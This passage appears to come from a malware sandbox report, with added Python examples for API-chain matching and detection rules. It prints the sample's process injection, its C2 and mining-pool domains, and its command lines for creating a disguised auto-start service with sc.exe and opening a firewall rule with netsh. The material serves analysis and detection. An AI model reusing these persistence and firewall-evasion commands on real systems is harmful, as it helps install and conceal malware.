                          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 39_2_00329A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          HIPS / PFW / Operating System Protection Evasion:

                          System process connects to network (likely due to code injection or exploit)
                          Source: C:\Windows\explorer.exe | Domain query: pool.supportxmr.com
                          Source: C:\Windows\SysWOW64\svchost.exe | Domain query: patmushta.info
                          Source: C:\Windows\explorer.exe | Domain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exe | Network Connect: 188.166.28.199 80
                          Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 40.93.212.0 25
                          Source: C:\Windows\explorer.exe | Domain query: unicupload.top
                          Source: C:\Windows\explorer.exe | Network Connect: 185.233.81.115 187
                          Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 8.209.67.104 443
                          Source: C:\Windows\explorer.exe | Network Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exe | Domain query: host-data-coin-11.com
                          Source: C:\Windows\explorer.exe | Domain query: privacy-tools-for-you-780.com
                          Source: C:\Windows\SysWOW64\svchost.exe | Domain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exe | Domain query: goo.su
                          Source: C:\Windows\explorer.exe | Domain query: transfer.sh
                          Source: C:\Windows\explorer.exe | Domain query: a0621298.xsph.ru
                          Source: C:\Windows\explorer.exe | Network Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exe | Domain query: data-host-coin-8.com
                          Benign windows process drops PE files
                          Source: C:\Windows\explorer.exe | File created: 8ED5.exe.7.dr
                          Maps a DLL or memory area into another process
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Source: C:\Users\user\AppData\Roaming\uufaeea | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\AppData\Roaming\uufaeea | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Source: C:\Users\user\AppData\Local\Temp\E666.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\AppData\Local\Temp\E666.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Allocates memory in foreign processes
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe | Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 320000 protect: page execute and read and write
                          Injects a PE file into a foreign process
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Memory written: C:\Users\user\Desktop\U3E7zMaux2.exe base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exe | Memory written: C:\Users\user\AppData\Local\Temp\8EC4.exe base: 400000 value starts with: 4D5A
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 320000 value starts with: 4D5A
                          Contains functionality to inject code into remote processes
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_00530110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
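The debugger-detection chains in the Anti Debugging section above (two GetTickCount reads, a branch, then ExitProcess or Sleep) and the process-hollowing chain in 0_2_00530110 just above are both ordered-subsequence matches over a function's API calls: the interesting calls must occur in order, but any amount of wsprintf/lstrcat noise may sit between them. The following Python is an added example, not code from the report or from the sample, that performs that matching over call lists copied from the chains the report prints. The pattern definitions, the Nt/Zw alias table and the A/W-suffix normalisation are this example's own assumptions about how the sandbox classifies the chains.

```python
"""Ordered API-chain matching of the kind behind the report's "API call chain" hits.

Added example (not the report's or the sample's code). Traces are copied from
the call chains the report prints; patterns and aliases are assumptions.
"""
from typing import Optional

# A kernel32 wrapper and the ntdll call it ends up in are the same operation.
ALIASES = {
    "NtWriteVirtualMemory": "WriteProcessMemory",
    "ZwWriteVirtualMemory": "WriteProcessMemory",
    "ZwUnmapViewOfSection": "NtUnmapViewOfSection",
    "NtResumeThread": "ResumeThread",
}

Pattern = list[tuple[str, ...]]  # ordered elements, each a tuple of accepted names

PATTERNS: dict[str, Pattern] = {
    # Hollowing as in 0_2_00530110: spawn, read the thread context, unmap the
    # original image, allocate and write a new one, redirect the thread, resume.
    "process_hollowing": [
        ("CreateProcess",), ("GetThreadContext",), ("NtUnmapViewOfSection",),
        ("VirtualAllocEx",), ("WriteProcessMemory",), ("SetThreadContext",),
        ("ResumeThread",),
    ],
    # Two tick-count reads bracketing a branch that bails out or stalls, i.e. the
    # report's "GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleep".
    "tick_count_debugger_check": [
        ("GetTickCount",), ("GetTickCount",), ("ExitProcess", "Sleep"),
    ],
}


def normalize(name: str) -> str:
    """Drop the ANSI/Unicode suffix (CreateProcessA -> CreateProcess), fold aliases."""
    name = name.strip()
    if len(name) > 2 and name[-1] in "AW" and name[-2].islower():
        name = name[:-1]
    return ALIASES.get(name, name)


def match_pattern(calls: list[str], pattern: Pattern) -> Optional[list[int]]:
    """Greedy ordered-subsequence match; returns the index of each matched element.

    Calls between the elements are ignored, which is what keeps the check immune
    to the wsprintf/lstrcat noise around the interesting calls. Branch markers such
    as "DecisionNodes" are not API calls and simply never match.
    """
    hits: list[int] = []
    for i, raw in enumerate(calls):
        if len(hits) == len(pattern):
            break
        if normalize(raw) in pattern[len(hits)]:
            hits.append(i)
    return hits if len(hits) == len(pattern) else None


def scan(calls: list[str]) -> dict[str, list[int]]:
    """Every pattern that matches one function's call list, with its indices."""
    found: dict[str, list[int]] = {}
    for name, pattern in PATTERNS.items():
        hit = match_pattern(calls, pattern)
        if hit is not None:
            found[name] = hit
    return found


def parse_chain(chain: str) -> list[str]:
    """Split a report-style 'A,B,C,' chain into names, dropping the trailing empty."""
    return [c.strip() for c in chain.split(",") if c.strip()]


# Constructed from the chains the report prints for these function ids.
TRACES = {
    "0_2_00530110": "VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,"
                    "GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,"
                    "NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,"
                    "SetThreadContext,ResumeThread,ExitProcess,",
    "21_2_00401D96": "CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,"
                     "GetProcAddress,GetCurrentProcess,GetTickCount,",
    # Tail of the 21_2_00409A6B entry-point chain (the part that carries the timing check).
    "21_2_00409A6B": "DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,"
                     "Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,",
}


def report_all() -> dict[str, dict[str, list[int]]]:
    return {fn: scan(parse_chain(chain)) for fn, chain in TRACES.items()}


if __name__ == "__main__":
    for fn, hits in report_all().items():
        print(fn, hits or "no pattern matched")
```

Greedy matching is enough here because every pattern element is a distinct step; a single GetTickCount (as in 21_2_00401D96) does not satisfy the timing pattern, and the Sleep calls that precede the first GetTickCount in 21_2_00409A6B are correctly ignored because the matcher only looks for the exit call after both reads.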
                          Creates a thread in another existing process (thread injection)
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Thread created: C:\Windows\explorer.exe EIP: 44E1930
                          Source: C:\Users\user\AppData\Roaming\uufaeea | Thread created: unknown EIP: 4F81930
                          Source: C:\Users\user\AppData\Local\Temp\E666.exe | Thread created: unknown EIP: 5C81930
                          Writes to foreign memory regions
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 320000
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 557008
                          .NET source code references suspicious native API functions
                          Source: 8EC4.exe.7.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 8EC4.exe.7.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 22.0.8EC4.exe.fa0000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 22.0.8EC4.exe.fa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 22.2.8EC4.exe.fa0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 22.2.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 22.0.8EC4.exe.fa0000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 22.0.8EC4.exe.fa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 22.0.8EC4.exe.fa0000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 22.0.8EC4.exe.fa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 22.0.8EC4.exe.fa0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 22.0.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 40.0.8EC4.exe.400000.10.unpack, NativeHelper.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 40.0.8EC4.exe.610000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 40.0.8EC4.exe.610000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 40.0.8EC4.exe.400000.6.unpack, NativeHelper.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 40.0.8EC4.exe.400000.8.unpack, NativeHelper.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 40.0.8EC4.exe.610000.9.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 40.0.8EC4.exe.610000.9.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 40.2.8EC4.exe.610000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 40.2.8EC4.exe.610000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 40.0.8EC4.exe.610000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 40.0.8EC4.exe.610000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Process created: C:\Users\user\Desktop\U3E7zMaux2.exe "C:\Users\user\Desktop\U3E7zMaux2.exe"
                          Source: C:\Users\user\AppData\Roaming\uufaeea | Process created: C:\Users\user\AppData\Roaming\uufaeea C:\Users\user\AppData\Roaming\uufaeea
                          Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5756 -ip 5756
                          Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 520
                          Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\E666.exe | Process created: C:\Users\user\AppData\Local\Temp\E666.exe C:\Users\user\AppData\Local\Temp\E666.exe
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\shayesoq\
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description shayesoq "wifi internet conection
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start shayesoq
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exe | Process created: C:\Users\user\AppData\Local\Temp\8EC4.exe C:\Users\user\AppData\Local\Temp\8EC4.exe
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
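The process tree above (a Temp binary staged into a new SysWOW64 subfolder, registered with sc.exe as an auto-start service whose binPath still points back at the Temp dropper, a netsh inbound allow rule for svchost.exe with a Microsoft-sounding name, and a svchost.exe spawned by that service binary instead of services.exe), together with the explorer.exe and svchost.exe connections listed under "System process connects to network", is the telemetry a detection engineer would write rules against; the page's own Sigma hits "Suspect Svchost Activity" and "Suspicious Svchost Process" cover part of it. The following Python is an added example, not code from the report, that evaluates such a rule set over process-creation, connection and DNS events constructed from the command lines and destinations printed in the report. The event fields, the rule names and the one-entry mining-pool list are this example's assumptions.

```python
"""Detection rules over process, connection and DNS events for the behaviour above.

Added example (not the report's code). Events are constructed from the command
lines and destinations the report prints; field and rule names are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str            # "process", "network" or "dns"
    image: str           # full path of the acting process
    cmdline: str = ""    # process events
    parent: str = ""     # process events: image path of the creator
    dst_host: str = ""   # network/dns events: IP or queried name
    dst_port: int = 0    # network events


SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
TEMP_MARK = "\\appdata\\local\\temp\\"
MINING_POOL_SUFFIXES = ("supportxmr.com",)  # only the pool seen in the report; use a feed in practice


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_system_subdir(path: str) -> bool:
    """Below System32/SysWOW64 but not directly in it (services are not installed there)."""
    p = path.lower()
    for d in SYSTEM_DIRS:
        if p.startswith(d):
            return "\\" in p[len(d):]
    return False


def r_sc_create(e: Event) -> bool:
    """sc create whose command references Temp or whose binary sits in a system-dir subfolder."""
    if e.kind != "process" or basename(e.image) != "sc.exe" or not re.search(r"\bcreate\b", e.cmdline, re.I):
        return False
    m = re.search(r'binpath=\s*"?(.*?\.exe)', e.cmdline, re.I)
    return TEMP_MARK in e.cmdline.lower() or in_system_subdir(m.group(1) if m else "")


def r_netsh_allow(e: Event) -> bool:
    """Inbound allow rule for svchost.exe (never needed) or for a program under AppData."""
    if e.kind != "process" or basename(e.image) != "netsh.exe":
        return False
    c = e.cmdline.lower()
    if "advfirewall" not in c or "add rule" not in c or "action=allow" not in c:
        return False
    m = re.search(r'program="?([^"\s]+)', e.cmdline, re.I)
    prog = m.group(1) if m else ""
    return basename(prog) == "svchost.exe" or "\\appdata\\" in prog.lower()


def r_cmd_staging(e: Event) -> bool:
    """cmd move/copy of something from Temp into the Windows directory."""
    if e.kind != "process" or basename(e.image) != "cmd.exe":
        return False
    c = e.cmdline.lower()
    if not re.search(r"\b(move|copy)\b", c) or TEMP_MARK not in c:
        return False
    return c.split()[-1].strip('"').startswith("c:\\windows\\")


RULES = [
    ("cmd_stages_temp_binary_into_windows", r_cmd_staging),
    ("sc_create_from_temp_or_system_subdir", r_sc_create),
    ("netsh_inbound_allow_for_svchost_or_appdata", r_netsh_allow),
    # svchost.exe is started by services.exe; production rules carry a few exclusions.
    ("svchost_not_started_by_services",
     lambda e: e.kind == "process" and basename(e.image) == "svchost.exe" and basename(e.parent) != "services.exe"),
    # Port 80/443 from explorer.exe needs proxy/WebDAV context, so only odd ports fire here.
    ("explorer_connects_non_web_port",
     lambda e: e.kind == "network" and basename(e.image) == "explorer.exe" and e.dst_port not in (80, 443)),
    ("svchost_smtp_connection",
     lambda e: e.kind == "network" and basename(e.image) == "svchost.exe" and e.dst_port == 25),
    ("explorer_resolves_mining_pool",
     lambda e: e.kind == "dns" and basename(e.image) == "explorer.exe" and e.dst_host.lower().endswith(MINING_POOL_SUFFIXES)),
]


def evaluate(events: list[Event]) -> list[tuple[int, str]]:
    """(event index, rule name) for every rule that fires, in event order."""
    return [(i, name) for i, e in enumerate(events) for name, rule in RULES if rule(e)]


TEMP = r"C:\Users\user\AppData\Local\Temp"
EVENTS = [  # constructed from the report's process tree and connections
    Event("process", r"C:\Windows\SysWOW64\cmd.exe", parent=TEMP + r"\86C4.exe",
          cmdline=r'"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq' "\\"),
    Event("process", r"C:\Windows\SysWOW64\sc.exe", parent=TEMP + r"\86C4.exe",
          cmdline=r'"C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support"'),
    Event("process", r"C:\Windows\SysWOW64\sc.exe", parent=TEMP + r"\86C4.exe",
          cmdline=r'"C:\Windows\System32\sc.exe" start shayesoq'),
    Event("process", r"C:\Windows\SysWOW64\netsh.exe", parent=TEMP + r"\86C4.exe",
          cmdline=r'"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes'),
    Event("process", r"C:\Windows\SysWOW64\svchost.exe", parent=r"C:\Windows\SysWOW64\shayesoq\lagavljy.exe", cmdline="svchost.exe"),
    Event("process", r"C:\Windows\SysWOW64\WerFault.exe", parent=r"C:\Windows\System32\svchost.exe",
          cmdline=r"C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 520"),  # benign crash reporter: must not fire
    Event("network", r"C:\Windows\explorer.exe", dst_host="185.233.81.115", dst_port=187),
    Event("network", r"C:\Windows\explorer.exe", dst_host="188.166.28.199", dst_port=80),
    Event("network", r"C:\Windows\SysWOW64\svchost.exe", dst_host="40.93.212.0", dst_port=25),
    Event("dns", r"C:\Windows\explorer.exe", dst_host="pool.supportxmr.com"),
]

if __name__ == "__main__":
    for idx, rule in evaluate(EVENTS):
        print(f"event {idx}: {rule}")
```

The WerFault.exe event spawned by the System32 svchost.exe and the explorer.exe connection on port 80 are kept as negatives: the first shows that the svchost rule keys on the child's image rather than the parent's, the second that a bare "explorer.exe talks to the internet" rule would need environment-specific exclusions before it is useful.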
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Code function: 21_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Code function: 21_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                          Source: explorer.exe, 00000007.00000000.699536382.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.682849926.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.671538738.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
                          Source: explorer.exe, 00000007.00000000.683142631.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.671690144.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.699823056.0000000001080000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.765182973.0000000000E30000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.759232501.0000000000E30000.00000002.00020000.sdmp, 7801.exe, 0000002B.00000002.1009587060.0000000003790000.00000002.00020000.sdmp | Binary or memory string: Program Manager
                          Source: explorer.exe, 00000007.00000000.683142631.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.689795661.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.671690144.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.699823056.0000000001080000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.765182973.0000000000E30000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.759232501.0000000000E30000.00000002.00020000.sdmp, 7801.exe, 0000002B.00000002.1009587060.0000000003790000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
                          Source: explorer.exe, 00000007.00000000.683142631.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.671690144.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.699823056.0000000001080000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.765182973.0000000000E30000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.759232501.0000000000E30000.00000002.00020000.sdmp, 7801.exe, 0000002B.00000002.1009587060.0000000003790000.00000002.00020000.sdmp | Binary or memory string: Progman
                          Source: explorer.exe, 00000007.00000000.683142631.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.671690144.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.699823056.0000000001080000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.765182973.0000000000E30000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.759232501.0000000000E30000.00000002.00020000.sdmp, 7801.exe, 0000002B.00000002.1009587060.0000000003790000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
                          Source: explorer.exe, 00000007.00000000.676243228.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.692994806.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.706560569.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: SetComputerNameW,EnumSystemLocalesW,GetConsoleAliasesA,FindResourceExA,GetVersionExA,VirtualQuery,CreateThread,SetComputerNameExW,_printf,_malloc,_calloc,__wfopen_s,_fseek,GetConsoleAliasA,GetModuleHandleA,LocalAlloc,GetConsoleTitleA,GetConsoleTitleA,GetConsoleTitleA,GetAtomNameA,CreateIoCompletionPort,GetFileAttributesW,GetDefaultCommConfigW,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\D984.exe | Code function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8EC4.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
